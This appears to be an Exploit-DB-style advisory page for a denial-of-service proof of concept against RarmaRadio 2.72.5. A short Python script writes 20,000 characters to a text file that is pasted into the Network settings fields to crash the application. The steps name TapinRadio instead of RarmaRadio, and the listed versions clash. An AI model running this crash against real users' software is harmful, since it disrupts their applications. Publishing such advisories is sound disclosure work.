header-logo
Suggest Exploit
vendor:
RarmaRadio
by:
Ismael Nava
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: RarmaRadio
Affected Version From: 2.72.5
Affected Version To: 2.75.5
Patch Exists: YES
Related CWE: n/a
CPE: a:raimersoft:rarmaradio
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home x64
2020

RarmaRadio 2.72.5 – Denial of Service (PoC)

RarmaRadio 2.72.5 is vulnerable to Denial of Service attack. An attacker can create a new .txt file with a large amount of data and paste the content in the field Username, Address and Server and click in OK to crash the application.

Mitigation:

The user should update the application to the latest version to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: https://www.raimersoft.com/rarmaradio.html
# Version: 2.75.5
# Tested on: Windows 10 Home x64
# CVE : n/a

#STEPS
# Open the program TapinRadio 
# In Edit select Settings option
# Click in Network
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Paimon.txt"
# Paste the content in the field Username, Address and Server and click in OK
# End :)


buffer = 'K' * 20000

try: 
    file = open("Paimon.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")